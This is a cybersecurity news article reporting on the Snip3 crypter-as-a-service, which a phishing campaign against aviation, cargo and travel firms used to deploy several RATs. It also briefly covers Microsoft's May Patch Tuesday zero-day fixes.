Home News Snip3: A New Crypter-as-a-Service that Deploys Multiple RATs

Snip3: A New Crypter-as-a-Service that Deploys Multiple RATs

The newly discovered Crypter-as-a-Service, dubbed “Snip3,” is used to deploy Revenge RAT, Agent Tesla, AsyncRAT, and NetWire RAT payloads on compromised systems.

Trojans, RAT, remote access trojan, Snip3 Crypter-as-a-Service

Microsoft discovered a spear-phishing campaign in the wild targeting airline, cargo, and travel industries with multiple Remote Access Trojans (RATs). The technology giant stated that attackers distributed malware payloads via phishing emails imitating legitimate businesses with malicious image and PDF attachments.

“The campaign uses emails that spoof legitimate organizations, with lures relevant to aviation, travel, or cargo. An image posing as a PDF file contains an embedded link (typically abusing legitimate web services) that downloads a malicious VBScript, which drops the RAT payloads,” Microsoft said.

Stealthy Malware Loader

Threat actors leverage multiple RATs to exfiltrate sensitive data from critical systems by adding extra malware payloads. According to cybersecurity firm Morphisec, RATs are delivered via a new and stealthy malware loader Crypter-as-a-Service that spreads them onto targeted machines.

The Crypter-as-a-Service, dubbed “Snip3,” is used to deploy Revenge RATAgent Tesla, AsyncRAT, and NetWire RAT payloads on compromised systems. Snip3 implements several advanced techniques to bypass detection, such as:

  • Executing PowerShell code with the Remotesigned parameter
  • Validating the existence of Windows Sandbox and VMWare virtualization
  • Using Pastebin and top4top for staging
  • Compiling RunPE loaders on the endpoint in runtime

Once the malicious attachment is downloaded, the first-stage VBScript VBS files will be installed simultaneously executing the second-stage PowerShell script, which in turn executes the final RAT payload using Process Hollowing.

“The Snip3 Crypter’s ability to identify sandboxing and virtual environments make it especially capable of bypassing detection-centric solutions. As a result, organizations with detection-focused stacks need to be wary of attacks like Snip3 and others. Morphisec customers can rest easy that they are protected against the evasive techniques Snip3 and other attacks like it employ,” Morphisec said.

Microsoft Fixes 55 Flaws

In a recent development, Microsoft’s May Patch Tuesday security update addressed over 55 vulnerabilities including four critically rated Zero-Day bugs. The now patched Zero-Day vulnerabilities include CVE-2021-31204 .NET and Visual Studio Elevation of Privilege Vulnerability, CVE-2021-31207 Microsoft Exchange Server Security Feature Bypass Vulnerability, CVE-2021-31200 Common Utilities Remote Code Execution Vulnerability, and Zero Day Initiative flagged CVE-2021-31166.